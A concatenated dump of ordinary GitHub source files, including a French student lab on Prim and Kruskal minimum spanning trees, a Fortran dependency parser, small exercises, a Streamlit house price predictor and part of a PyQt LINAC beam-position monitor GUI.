0.13s sur ma machine (Intel Core i5)\nt2 = time.time()\nprint(\"KRUSKAL_UFF: \", round(t2-t1, 2), \"s\", sep=\"\")\n\nquit()\n\"\"\"\n\n\n##########################\n### Algorithme de Prim ###\n##########################\n\n# Le pseudo-code de l'algorithme de Prim se trouve sur Wikipédia :\n# https://fr.wikipedia.org/wiki/Algorithme_de_Prim\n# Son implémentation requiert l'utilisation d'une structure de file de\n# priorité. Il ne vous est pas demandé d'implémenter une telle structure pour\n# ce TP (mais ça le sera pour le TP suivant :) ). 
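(Rappel ajouté, propriété générale des tas : une file de priorité retire l'élément de coût minimum en O(log n), et c'est précisément l'opération que Prim répète une fois par sommet.)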
Ici, vous pouvez utiliser la\n# classe TasBinomial qui vous est fournie et s'utilise ainsi :\n\n# Créer une file de priorité contenant des éléments indicés de 0 à n-1 :\n# >>> f = TasBinomial(n)\n# Ajouter un élément v de cout c ou mettre à jour son cout s'il est déjà dans\n# la file :\n# >>> f.ajouter(v, c)\n# Retirer l'élément de cout minimum :\n# >>> v, cv = f.retirer()\n# Obtenir le cout de l'élément d'indice v (retourne float('inf') si v n'est pas\n# dans la file) :\n# >>> c = f.cout(v)\n# Pour savoir si la file est vide :\n# >>> f.est_vide()\n\ndef prim(g):\n \"\"\"Retourne un arbre couvrant de poids minimum du graphe g en utilisant\n l'algorithme de Prim.\n\n Le sommet de départ est le sommet d'indice 0.\n\n :param g: un graphe (Graphe) connexe\n :return: un couple (t, l) où\n * t est un arbre (Graphe) couvrant de poids minimum de g\n * l est une liste telle que l[u] est l'itération à laquelle le sommet u\n a été traité.\n\n :Examples:\n\n >>> prim(graphe_1())\n ({4: 0-1-1 0-2-2 1-4-3}, [0, 1, 2, 3])\n >>> prim(graphe_2())\n ({4: 0-1-2 1-4-3 2-3-3}, [0, 3, 1, 2])\n >>> prim(graphe_3(4))\n ({4: 0-1-1 0-2-2 1-4-3}, [0, 1, 2, 3])\n >>> prim(graphe_3(5))\n ({5: 0-1-1 0-2-2 1-4-3 2-6-4}, [0, 1, 2, 3, 4])\n\n \"\"\"\n\n # Petite astuce pour économiser une ligne :\n # >>> it = iter(range(n))\n # >>> next(it)\n # 0\n # >>> next(it)\n # 1\n # ...\n\n n = g.nombre_sommets()\n pred = [None]*n\n l = [None]*n # l[v] == None <=> v n'a pas encore été ajouté\n t = Graphe(n)\n f = TasBinomial(n)\n it = iter(range(n))\n\n # À COMPLÉTER DÉBUT (10 ligne(s))\n # Suit le pseudo-code de Wikipédia cité plus haut, avec la classe\n # TasBinomial décrite ci-dessus comme file de priorité ; f.ajouter sert\n # aussi de « decrease-key » quand on trouve une arête moins chère.\n f.ajouter(0, 0)\n while not f.est_vide():\n u, cu = f.retirer()\n l[u] = next(it)\n if pred[u] is not None:\n t.ajouter_arete(pred[u], u, cu)\n for v, p in g.voisins_avec_poids(u):\n if l[v] is None and p < f.cout(v):\n pred[v] = u\n f.ajouter(v, p)\n # À COMPLÉTER FIN\n\n return (t, l)\n\n\ndef graphe_4(n):\n \"\"\"Retourne le graphe G4 à n+2 sommets, tel que le sous-graphe induit par les\n n premiers sommets est complet avec un poids de 2 sur chaque arête, et G4\n contient les arêtes (0,n) avec un poids de 1 et (0,n+1) avec un poids de 3.\n\n :param n: Nombre de sommets, entier naturel non nul\n\n n\n \\ /2\n 3\\ /\n \\ / 2\n 0---- ...\n / \\\n 1/ \\\n / \\2\n n+1\n\n :Examples:\n\n >>> graphe_4(1)\n {3: 0-1-1 0-3-2}\n >>> graphe_4(2)\n {4: 0-2-1 0-1-2 0-3-3}\n >>> graphe_4(3)\n {5: 0-2-1 0-2-2 0-1-3 0-3-4 1-2-2}\n\n \"\"\"\n\n g = Graphe(n+2)\n for u in range(n):\n for v in range(u+1, n):\n g.ajouter_arete(u, v, 2)\n g.ajouter_arete(0, n, 1)\n g.ajouter_arete(0, n+1, 3)\n return g\n\n# Décommentez les lignes suivantes pour comparer la différence de temps\n# d'exécution entre les différents algorithmes implémentés.\n# Quelques résultats à noter :\n# * L'algorithme de Kruskal inversé est toujours beaucoup plus lent que les\n# autres algorithmes.\n# * L'algorithme de Prim est le plus efficace sur les graphes denses, comme\n# G4(n). Il bat largement les différentes versions de l'algorithme de Kruskal.\n# * L'algorithme de Kruskal avec l'UNION-FIND utilisant les forêts est le plus\n# rapide sur les graphes peu denses, comme G3(n), mais Prim n'est vraiment pas\n# loin.\n# * Sur les graphes denses, comme G4(n), l'algorithme de Kruskal avec\n# l'UNION-FIND utilisant les forêts est un peu moins rapide que celui utilisant\n# le tableau.\n\n\n\"\"\"\ng = graphe_4(1024)\n# g = graphe_3(8192)\nt0 = time.time()\n\n# kruskal_inverse(g) # Beaucoup trop long sur ma machine... 
(Intel Core i5)\nt1 = time.time()\n# print(\"KRUSKAL_INV: \", round(t1-t0, 2), \"s\", sep=\"\")\n\nkruskal_ufl(g) # 0.48s sur ma machine (Intel Core i5)\nt2 = time.time()\nprint(\"KRUSKAL_UFL: \", round(t2-t1, 2), \"s\", sep=\"\")\n\nkruskal_uff(g) # 0.63s sur ma machine (Intel Core i5)\nt3 = time.time()\nprint(\"KRUSKAL_UFF: \", round(t3-t2, 2), \"s\", sep=\"\")\n\nprim(g) # 0.3s sur ma machine (Intel Core i5)\nt4 = time.time()\nprint(\"PRIM: \", round(t4-t3, 2), \"s\", sep=\"\")\n\nquit()\n\"\"\"\n\n\nif __name__ == \"__main__\":\n import doctest\n fonctions = [\n graphe_1,\n graphe_2,\n graphe_3,\n aretes_triees,\n est_connexe,\n kruskal_inverse,\n ufl_creer,\n ufl_find,\n ufl_union,\n kruskal_ufl,\n uff_creer,\n uff_find,\n uff_union,\n kruskal_uff,\n prim,\n ]\n for f in fonctions:\n print(\"**********************************************************************\")\n print(f.__name__)\n doctest.run_docstring_examples(\n f, globals(), optionflags=doctest.FAIL_FAST)\n","repo_name":"ThearchyHelios/INF303","sub_path":"TP3/tp.py","file_name":"tp.py","file_ext":"py","file_size_in_byte":26142,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28539822705","text":"import re\n\nfrom depgen import IncludeFinder, StreamStack, file_in_dir, open23, \\\n find_unquoted_string\n\n\nclass FortranParser:\n _re_include = re.compile(r'^\\s*include\\s+(\\'|\")(.*?)\\1', re.I)\n _re_line_continue_start = re.compile(r'^(.*)&\\s*$')\n _re_line_continue_end = re.compile(r'^\\s*&')\n _re_module_provide = re.compile(r'^\\s*module\\s+(?!procedure\\s)(\\w+)', re.I)\n _re_module_require = re.compile(\n r'^\\s*use(?:\\s+|(?:\\s*,\\s*((?:non_)?intrinsic))?\\s*::\\s*)(\\w+)', re.I)\n\n def __init__(self,\n include_order=None,\n include_dirs=None,\n include_roots=None,\n intrinsic_mods=None,\n external_mods=None):\n self.include_roots = include_roots\n\n if intrinsic_mods:\n self.intrinsic_mods = set(intrinsic_mods)\n else:\n self.intrinsic_mods = set()\n\n if external_mods:\n self.external_mods = set(external_mods)\n else:\n self.external_mods = set()\n\n # Callbacks:\n self.include_callback = None\n self.module_callback = None\n self.use_module_callback = None\n self.debug_callback = None\n\n self._include_finder = IncludeFinder(include_order, include_dirs)\n\n def parse(self, stream):\n with StreamStack() as s:\n s.add(stream)\n while 1:\n line = s.readline()\n if not line:\n break\n\n # delete comments\n line = FortranParser._delete_comments(line)\n if line.isspace():\n continue\n\n # line continuation\n match = FortranParser._re_line_continue_start.match(line)\n while match:\n next_line = s.readline()\n if not next_line:\n break\n\n next_line = FortranParser._delete_comments(next_line)\n\n # If the line contains only comments, we need the next one\n # TODO: implement a separate class FortranPrepcocessor\n if next_line.isspace():\n continue\n\n line = match.group(1) + re.sub(\n FortranParser._re_line_continue_end, '', next_line)\n\n match = FortranParser._re_line_continue_start.match(line)\n\n for line in FortranParser._split_semicolons(line):\n # module provided\n match = FortranParser._re_module_provide.match(line)\n if match:\n module_name = match.group(1).lower()\n if self.module_callback:\n self.module_callback(module_name)\n if self.debug_callback:\n self.debug_callback(\n line, 'declared module \\'%s\\'' % module_name)\n continue\n\n # module required\n match = FortranParser._re_module_require.match(line)\n if match:\n module_nature = 
match.group(1).lower() \\\n if match.group(1) is not None else ''\n module_name = match.group(2).lower()\n if module_nature == 'intrinsic':\n if self.debug_callback:\n self.debug_callback(\n line, 'ignored module usage (\\'%s\\' '\n 'is explicitly intrinsic)'\n % module_name)\n elif (module_name in self.intrinsic_mods and\n module_nature != 'non_intrinsic'):\n if self.debug_callback:\n self.debug_callback(\n line, 'ignored module usage (\\'%s\\' '\n 'is implicitly intrinsic)'\n % module_name)\n elif module_name in self.external_mods:\n if self.debug_callback:\n self.debug_callback(\n line, 'ignored module usage (\\'%s\\' '\n 'is external)' % module_name)\n else:\n if self.use_module_callback:\n self.use_module_callback(module_name)\n if self.debug_callback:\n self.debug_callback(\n line, 'used module \\'%s\\'' % module_name)\n continue\n\n # include statement\n match = FortranParser._re_include.match(line)\n if match:\n filename = match.group(2)\n filepath = self._include_finder.find(\n filename,\n s.root_name,\n s.current_name)\n if filepath:\n if not self.include_roots or any(\n [file_in_dir(filepath, d)\n for d in self.include_roots]):\n s.add(open23(filepath, 'r'))\n if self.include_callback:\n self.include_callback(filepath)\n if self.debug_callback:\n self.debug_callback(\n line, 'included file \\'%s\\''\n % filepath)\n elif self.debug_callback:\n self.debug_callback(\n line,\n 'ignored (file \\'%s\\' '\n 'is not in the source roots)' % filepath)\n elif self.debug_callback:\n self.debug_callback(line,\n 'ignored (file not found)')\n continue\n\n @staticmethod\n def _split_semicolons(line):\n while 1:\n idx = find_unquoted_string(';', line)\n if idx < 0:\n if line and not line.isspace():\n yield line\n break\n else:\n prefix = line[:idx]\n if prefix and not prefix.isspace():\n yield prefix + '\\n'\n line = line[idx + 1:]\n\n @staticmethod\n def _delete_comments(line):\n comment_idx = find_unquoted_string('!', line)\n if comment_idx >= 0:\n line = line[:comment_idx]\n return line\n\n","repo_name":"skosukhin/mkhelper","sub_path":"mkhelper/depgen/fortran_parser.py","file_name":"fortran_parser.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"6243698463","text":"# https://app.codesignal.com/arcade/intro/level-2/2mxbGwLzvkTCKAJMG\n\na=[1, 3, 2, 1]\nincr=True\ndelCount=0\nfor i in range(len(a)-1 , 0 ,-1):\n print(a[i],\" ---- \",a[i-1])\n if a[i]-a[i-1]<=0:#if num not grater than before it\n incr=False\n delCount +=1\nprint(delCount)\nprint(incr)","repo_name":"MohammedTAgha/Brain-fu__n","sub_path":"CODE_SIGNAL/almostIncreasingSequence.py","file_name":"almostIncreasingSequence.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71168157922","text":"from extensions import db\n\ngenre_tag = db.Table(\"genre_tag\",\n db.Column(\"genre_id\", db.Integer, db.ForeignKey(\"genres.id\"), primary_key=True),\n db.Column(\"movie_id\", db.Integer, db.ForeignKey(\"movies.id\"), primary_key=True)\n)\n\n\nclass Genre(db.Model):\n __tablename__ = \"genres\"\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String, nullable=True, unique=True)\n movies = db.relationship(\"Movie\", secondary=genre_tag, lazy=\"subquery\", 
back_populates=\"genres\")\n\n","repo_name":"timiredmind/recommender_system","sub_path":"models/genres.py","file_name":"genres.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10391958219","text":"\"\"\"\nThis program gets Wildcard of the given ip address in CIDR notation\n\"\"\"\n\nimport requests\nimport json\n\n\"\"\"\nGet the wildcard of the given IP adress\n\"\"\"\n\ndef getWildcard(ip):\n link = \"https://uploadbeta.com/api/ipcalc/?cached&s=\" + ip\n response = requests.get(link)\n parsed_json = json.loads(response.text)\n print(parsed_json)\n s =\"\"\n for i in range (149,170):\n s +=parsed_json[i]\n final = s.replace(\" \", \"\")\n print(final)\n return final\n\n\n\"\"\"\nMakes a text file with output.txt and outputs wildcard\n\"\"\"\n\ndef fileBuilder(ip):\n ab = ip.find(\"/\")\n modifiedIp = ip[:ip.find(\"/\")]\n finalString = \"The wildcard for the IP \" + modifiedIp + \" is- \" + getWildcard(ip) + \"\\n\"\n f = open(\"output.txt\", \"a+\")\n f.write(finalString)\n\n\n\"\"\"\nTakes input of a text file named input.txt with ip addresses in \nevery new line\n\"\"\"\n\ndef main():\n fname = \"input.txt\" # sample input ip/[1-32] i.g- 8.8.8.8/20\n with open(fname) as f:\n content = f.readlines()\n finalList = []\n for i in content:\n a = i.replace(\"\\n\", \"\")\n finalList.append(a)\n print(finalList)\n for b in finalList:\n fileBuilder(b)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"mxnavid/Network-Tools","sub_path":"wildCard.py","file_name":"wildCard.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30588230870","text":"import streamlit as st\n# import requests\nimport pandas as pd\nimport pickle\n\n# ============= DATA LOADING =============\n\nwith open(\"pipe_linear_regression.pkl\", \"rb\") as model_file:\n model = pickle.load(model_file)\n\ndf = pd.read_csv('house_price_pred.csv')\nmask_floors = {1: 1, 1.5 : 1, 2:2, 2.5:2, 3:3, 3.5:3}\ndf['floors'] = df['floors'].map(mask_floors)\ndf['yr_renovated'] = df['yr_renovated'].apply(lambda x: 0 if x==0 else 1)\n# price = df['price']\n\nst.title(\"Aplikasi Prediksi Harga Rumah di Negara Amerika Serikat (USA)\")\nst.write(\"Created by Lutfi Adam\")\n\ncolumns = ['bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors',\n 'condition', 'sqft_above', 'sqft_basement', 'yr_built', 'yr_renovated',\n 'city']\n\n# ============= INPUT =============\ncity = st.selectbox(\"Lokasi Kota\", df['city'].unique())\nbedroom = st.selectbox(\"Kamar Tidur\", df['bedrooms'].unique())\nbathroom = st.selectbox(\"Kamar Mandi\", df['bathrooms'].unique())\nfloor = st.selectbox(\"Tingkatan Rumah\", df['floors'].unique())\ncondition = st.selectbox(\"Kondisi Rumah\", df['condition'].unique())\nabove = st.number_input(\"Luas Tanah\")\nlot = st.number_input(\"Luas Halaman Rumah\")\nliving = st.number_input(\"Luas Ruang Tamu\")\nbasement = st.number_input(\"Luas Ruang Bawah Tanah\")\nyear_build = st.number_input('Tahun Rumah dibangun')\nrenovated = st.selectbox(\"Rumah Sudah di Renovasi (Sudah direnovasi = 1, Belum direnovasi = 0)\", df['yr_renovated'].unique())\n\n\n\n# =========== INFERENCE =============\nnew_data = [bedroom,bathroom,living,lot,floor,condition,above,basement,year_build,renovated,city]\nnew_data = pd.DataFrame([new_data], columns=columns)\nres = model.predict(new_data)\npress = st.button('PREDIKSI')\nif press:\n 
st.write(f'HARGA RUMAH : {res[0]}')","repo_name":"lutfiadam97/house_price_in_USA","sub_path":"all_in_one.py","file_name":"all_in_one.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16924432357","text":"# Function to draw 2d Self-Avoiding Walk (Square Lattice model)\n\n# 周期的境界条件の設定(v3)\n# coordinateXY_listを使わない計算\n\nimport random as rd\nfrom math import *\n\ndef saw2dFuncM(lattice_x, lattice_y, coordinate_init, occupied_coordinate_list, N):\n\n num = 0\n num_f = 0\n\n direction_list = ([1,0],[-1,0],[0,1],[0,-1])\n\n while num < N:\n num = 0\n rep = 0 # 経路を探せなかったときの繰り返し回数\n x, y = coordinate_init[0], coordinate_init[1]\n x_list = [x]\n y_list = [y]\n coordinate_list = [[x,y]] \n coordinate_list = occupied_coordinate_list + coordinate_list\n num_list = []\n while rep < 20 and num < N:\n step = rd.choice(direction_list)\n x_temp = x + step[0]\n y_temp = y + step[1]\n if x_temp >= lattice_x:\n x_temp = x_temp - lattice_x\n if x_temp < 0:\n x_temp = x_temp + lattice_x\n if y_temp >= lattice_y:\n y_temp = y_temp - lattice_y\n if y_temp < 0:\n y_temp = y_temp + lattice_y\n coordinate_temp = [x_temp, y_temp]\n if coordinate_temp in coordinate_list:\n num = num\n num_list.append(num)\n rep = num_list.count(num_list[-1]) \n else:\n x = x_temp\n y = y_temp\n x_list.append(x)\n y_list.append(y)\n coordinate = [x, y]\n coordinate_list.append(coordinate)\n num = num + 1\n if num == N:\n print(\"final num = {}: success\".format(num+1)) # to check the number of steps\n occupied_coordinate_list = coordinate_list\n else:\n print(\"final num = {}: failure\".format(num+1)) # to check the number of steps\n num_f = num_f + 1\n if num_f == 100:\n print(\"num_f = {}\".format(num_f))\n break\n\n return occupied_coordinate_list","repo_name":"knakaji1210/lecture_polymphys_sawsolution","sub_path":"saw2dFuncM_v3.py","file_name":"saw2dFuncM_v3.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26672088517","text":"\n\nimport os\nimport re\nimport string\nimport urllib\nimport pandas as pd\nimport urllib.request\nfrom Bio import SeqIO\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom itertools import groupby\nfrom tensorflow.keras import layers\n\ndef download_file(file_url: str, data_dir: str = \"./data\"):\n file_name = file_url.split(\"/\")[-1]\n if not os.path.isfile(os.path.join(data_dir, file_name)):\n if not os.path.exists(data_dir): os.makedirs(data_dir)\n print(f\"Downloading {file_url}. 
Warning - slower than downloading externally\")\n urllib.request.urlretrieve(file_url, os.path.join(data_dir, file_name))\n\ndef deduplicate_list(res: list):\n from collections import OrderedDict\n return list(OrderedDict.fromkeys(res))\n\ndef extract_scop(file_path:str,split_char:str=\" \", label_index:int=1, max_records = 1e6) -> list:\n record_iterator = SeqIO.parse(file_path, \"fasta\")\n all_records = []\n for seq_record in record_iterator:\n if len(all_records)<=max_records:\n protein_class = seq_record.description.split(split_char)[label_index] # this is the class label taken from the FASTA header\n protein_sequence = str(seq_record.seq).upper()\n all_records.append((\n protein_sequence,\n protein_class\n ))\n return(all_records)\n\ndef sliding_truncate_df_seqs_lengthwise(row,max_length:int = 4096):\n r_len = len(row)\n if r_len > max_length:\n return(row[0:max_length//2] + row[-max_length//2:]) # take first and last segments up to max length total\n return row\n\ndef cut_string(text:str,get_first_part=True)->str:\n midpoint = len(text)//2\n if get_first_part:\n return(text[0:midpoint])\n else:\n return(text[midpoint:])\n\ndef fasta_iter(fasta_name,max_records:int=1e8,seq_only:bool=True,MAX_LEN:int= None):\n fh = open(fasta_name)\n faiter = (x[1] for x in groupby(fh, lambda line: line[0] == \">\"))\n for i,header in enumerate(faiter):\n if i>max_records: break\n header = header.__next__()[1:].strip()\n seq = \"\".join(s.strip() for s in faiter.__next__())\n if MAX_LEN is not None:\n seq = sliding_truncate_df_seqs_lengthwise(row=seq,max_length = MAX_LEN)\n if seq_only: \n yield seq\n else:\n yield header, seq\n \ndef fasta_to_df(fasta_path,max_records:int=1e9,seq_only=False,MAX_LEN= None):\n # Propagate MAX_LEN instead of hard-coding None, so the parameter is not silently ignored.\n return pd.DataFrame(fasta_iter(fasta_name=fasta_path,max_records=max_records,seq_only=seq_only,MAX_LEN=MAX_LEN))\n\ndef normalize_word(data_str):\n url_re = re.compile('https?://(www.)?\\w+\\.\\w+(/\\w+)*/?')\n punc_re = re.compile('[%s]' % re.escape(string.punctuation))\n num_re = re.compile('(\\\\d+)')\n mention_re = re.compile('@(\\w+)')\n alpha_num_re = re.compile(\"^[a-z0-9_.]+$\")\n data_str = data_str.lower()\n data_str = url_re.sub(' ', data_str)\n data_str = mention_re.sub(' ', data_str)\n data_str = punc_re.sub(' ', data_str)\n data_str = num_re.sub(' ', data_str)\n list_pos = 0\n cleaned_str = ''\n for word in data_str.split():\n if list_pos == 0:\n if alpha_num_re.match(word) and len(word) > 2:\n cleaned_str = word\n else:\n cleaned_str = ' '\n else:\n if alpha_num_re.match(word) and len(word) > 2:\n cleaned_str = cleaned_str + ' ' + word\n else:\n cleaned_str += ' '\n list_pos += 1\n return cleaned_str\n","repo_name":"ddofer/ProteinBert","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"37772093761","text":"# import __main__ as main\n# from Helper.TimerLogger import CodeTimeLogging\n# fileName = main.__file__\n# fileName = fileName.split('\\\\')[-1]\n\n# CodeTimeLogging(Flag='F', filename=fileName, Tag='String', Difficult='Medium')\n\n\ndef removeKdigits(num, k):\n stack = []\n for i in range(len(num)):\n\n curr = num[i]\n while stack and k and num[i] < stack[-1]:\n stack.pop()\n k -= 1\n stack.append(curr)\n print(stack)\n\n if k:\n del stack[-k:]\n res = ''.join(stack).lstrip('0')\n return res if res else '0'\n\n\nnum = \"1432219\"\nk = 3\n\nprint(removeKdigits(num, 
k))\n","repo_name":"Omkar02/FAANG","sub_path":"AZ_LC_402_Remove_K_Digits.py","file_name":"AZ_LC_402_Remove_K_Digits.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14229305154","text":"from bisect import *\n\ndef increasingTriplet(nums):\n min1, min2 = nums[0], float('inf')\n for i in nums:\n if min2 < i: return True\n if min1 < i:\n min2 = min(min2, i)\n else:\n min1 = i\n return False\n\nincreasingTriplet([2,1,5,0,4,6])","repo_name":"Hrishi246/InterviewPractise","sub_path":"Misc/increasingTriplet.py","file_name":"increasingTriplet.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26256279014","text":"''' Diagnostic Interface of the LINAC's BPM'''\nfrom qtpy.QtCore import Qt\nfrom qtpy.QtWidgets import QGroupBox, QVBoxLayout, QTabWidget, \\\n QWidget, QLabel, QGridLayout\nimport qtawesome as qta\nfrom pydm.widgets import enum_button, PyDMEnumComboBox\n\nfrom ..util import get_appropriate_color\nfrom ..widgets import SiriusMainWindow, SiriusLedState, SiriusLabel, \\\n SiriusSpinbox\nfrom ..as_di_bpms.base import GraphWave\n\n\nclass DigBeamPosProc(SiriusMainWindow):\n ''' Class Digital Beam Position Processor '''\n\n def __init__(self, device_name, prefix='', parent=None):\n '''Contain all the graphic interface data'''\n super().__init__(parent)\n self.device_name = device_name\n self.prefix = prefix + ('-' if prefix else '')\n\n color = get_appropriate_color('LI')\n self.setWindowIcon(qta.icon('mdi.currency-sign', color=color))\n self.setObjectName('LIApp')\n\n self.setWindowTitle(self.device_name)\n\n self.header = {\n \"Trigger\": \"TRIGGER_STATUS\",\n \"IOC\": \"HEART_BEAT\"\n }\n\n self.graph_all_data = {\n \"ADC Raw Waveform\": {\n \"title\": \"ADC\",\n \"labelX\": \"Waveform Index\",\n \"unitX\": \"\",\n \"labelY\": \"ADC Value\",\n \"unitY\": \"count\",\n \"channels\": {\n \"CH1\": {\n \"path\": \"CH1_ADX_WAVEFORM\",\n \"name\": \"AntA\",\n \"color\": \"#0000FF\"\n },\n \"CH2\": {\n \"path\": \"CH2_ADX_WAVEFORM\",\n \"name\": \"AntB\",\n \"color\": \"#FF0000\"\n },\n \"CH3\": {\n \"path\": \"CH3_ADX_WAVEFORM\",\n \"name\": \"AntC\",\n \"color\": \"#008800\"\n },\n \"CH4\": {\n \"path\": \"CH4_ADX_WAVEFORM\",\n \"name\": \"AntD\",\n \"color\": \"#FF00FF\"\n }\n }\n },\n \"Hilbert\": {\n \"Amplitude\": {\n \"title\": \"Amplitude\",\n \"labelX\": \"Waveform Index\",\n \"unitX\": \"\",\n \"labelY\": \"Amplitude Value\",\n \"unitY\": \"count\",\n \"channels\": {\n \"CH1\": {\n \"path\": \"CH1_HIB_AMP_WAVEFORM\",\n \"name\": \"AntA\",\n \"color\": \"#0000FF\"\n },\n \"CH2\": {\n \"path\": \"CH2_HIB_AMP_WAVEFORM\",\n \"name\": \"AntB\",\n \"color\": \"#FF0000\"\n },\n \"CH3\": {\n \"path\": \"CH3_HIB_AMP_WAVEFORM\",\n \"name\": \"AntC\",\n \"color\": \"#008800\"\n },\n \"CH4\": {\n \"path\": \"CH4_HIB_AMP_WAVEFORM\",\n \"name\": \"AntD\",\n \"color\": \"#FF00FF\"\n }\n }\n },\n \"Phase\": {\n \"title\": \"Phase\",\n \"labelX\": \"Waveform Index\",\n \"unitX\": \"\",\n \"labelY\": \"Phase Value\",\n \"unitY\": \"count\",\n \"channels\": {\n \"CH1\": {\n \"path\": \"CH1_HIB_PH_WAVEFORM\",\n \"name\": \"AntA\",\n \"color\": \"#0000FF\"\n },\n \"CH2\": {\n \"path\": \"CH2_HIB_PH_WAVEFORM\",\n \"name\": \"AntB\",\n \"color\": \"#FF0000\"\n },\n \"CH3\": {\n \"path\": \"CH3_HIB_PH_WAVEFORM\",\n \"name\": \"AntC\",\n \"color\": \"#008800\"\n },\n \"CH4\": {\n \"path\": 
\"CH4_HIB_PH_WAVEFORM\",\n \"name\": \"AntD\",\n \"color\": \"#FF00FF\"\n }\n }\n }\n },\n \"FFT\": {\n \"Amplitude\": {\n \"title\": \"Amplitude\",\n \"labelX\": \"Waveform Index\",\n \"unitX\": \"\",\n \"labelY\": \"Amplitude Value\",\n \"unitY\": \"count\",\n \"channels\": {\n \"CH1\": {\n \"path\": \"CH1_FFT_AMP_WAVEFORM\",\n \"name\": \"AntA\",\n \"color\": \"#0000FF\"\n },\n \"CH2\": {\n \"path\": \"CH2_FFT_AMP_WAVEFORM\",\n \"name\": \"AntB\",\n \"color\": \"#FF0000\"\n },\n \"CH3\": {\n \"path\": \"CH3_FFT_AMP_WAVEFORM\",\n \"name\": \"AntC\",\n \"color\": \"#008800\"\n },\n \"CH4\": {\n \"path\": \"CH4_FFT_AMP_WAVEFORM\",\n \"name\": \"AntD\",\n \"color\": \"#FF00FF\"\n }\n }\n },\n \"Phase\": {\n \"title\": \"Phase\",\n \"labelX\": \"Waveform Index\",\n \"unitX\": \"\",\n \"labelY\": \"Phase Value\",\n \"unitY\": \"count\",\n \"channels\": {\n \"CH1\": {\n \"path\": \"CH1_FFT_PH_WAVEFORM\",\n \"name\": \"AntA\",\n \"color\": \"#0000FF\"\n },\n \"CH2\": {\n \"path\": \"CH2_FFT_PH_WAVEFORM\",\n \"name\": \"AntB\",\n \"color\": \"#FF0000\"\n },\n \"CH3\": {\n \"path\": \"CH3_FFT_PH_WAVEFORM\",\n \"name\": \"AntC\",\n \"color\": \"#008800\"\n },\n \"CH4\": {\n \"path\": \"CH4_FFT_PH_WAVEFORM\",\n \"name\": \"AntD\",\n \"color\": \"#FF00FF\"\n }\n }\n }\n }\n }\n\n self.bpm_main_data = {\n \"Max ADC\": {\n \"A\": \"CH1_MAXADC\",\n \"B\": \"CH2_MAXADC\",\n \"C\": \"CH3_MAXADC\",\n \"D\": \"CH4_MAXADC\"\n },\n \"Position\": {\n \"X\": \"POS_X\",\n \"Y\": \"POS_Y\",\n \"S\": \"POS_S\"\n },\n \"V\": {\n \"A\": \"POS_VA\",\n \"B\": \"POS_VB\",\n \"C\": \"POS_VC\",\n \"D\": \"POS_VD\"\n },\n \"Trigger Cnt\": \"TRIGGER_CNT\",\n \"Cycle\": \"ACQ_TIME_USED\",\n \"FFT\": {\n \"Center\": \"FFT_CENTER\",\n \"Width\": \"FFT_WIDTH\"\n },\n \"Hilbert\": {\n \"Center\": \"HIB_CENTER\",\n \"Width\": \"HIB_WIDTH\"\n },\n \"Gain\": {\n \"X\": \"POS_KX\",\n \"Y\": \"POS_KY\",\n \"S\": \"POS_KS\"\n },\n \"Offset\": {\n \"X\": \"POS_OX\",\n \"Y\": \"POS_OY\"\n }\n }\n\n self.bpm_sec_data = {\n \"Attenuator\": \"FE_ATTEN_SP\",\n \"ADC Threshold\": \"ADC_THD\",\n \"Orientation\": \"BPM_STRIP\"\n }\n\n self.selectors_data = {\n \"Trigger Mode\": \"ACQ_TRIGGER\",\n \"Position Algorithm\": \"POS_ALG\"\n }\n\n self._setupUi()\n\n def _setupUi(self):\n '''Build the graphic interface'''\n wid = QWidget(self)\n if_glay = QGridLayout()\n\n if_glay.addLayout(self.display_header(), 0, 0, 1, 3)\n if_glay.addLayout(self.display_graph(), 1, 0, 2, 1)\n if_glay.addLayout(self.display_mainData(), 1, 1, 1, 1)\n if_glay.addLayout(self.display_selectors(), 1, 2, 1, 1)\n if_glay.setAlignment(Qt.AlignTop)\n if_glay.setColumnStretch(0, 10)\n\n wid.setLayout(if_glay)\n self.setCentralWidget(wid)\n\n def display_header(self):\n '''Display the header of the interface'''\n hd_glay = QGridLayout()\n\n title_lb = QLabel('<h2>' + self.device_name + ' - POSITION MONITOR </h2>', self)\n title_lb.setAlignment(Qt.AlignCenter)\n hd_glay.addWidget(title_lb, 0, 2, 2, 1)\n\n countx = 0\n\n for led_lb, led_channel in self.header.items():\n trig_led = SiriusLedState(\n init_channel=self.prefix + self.device_name + ':' + led_channel)\n trig_led.setFixedSize(30, 30)\n hd_glay.addWidget(trig_led, 0, countx, 1, 1)\n\n trig_lb = QLabel(led_lb)\n trig_lb.setAlignment(Qt.AlignCenter)\n hd_glay.addWidget(trig_lb, 1, countx, 1, 1)\n\n countx += 1\n\n hd_glay.setAlignment(Qt.AlignCenter)\n\n return hd_glay\n\n def createGraph(self, graph_data):\n '''Build a graph widget'''\n graph_plot = GraphWave()\n\n graph_plot.graph.title = graph_data.get(\"title\")\n 
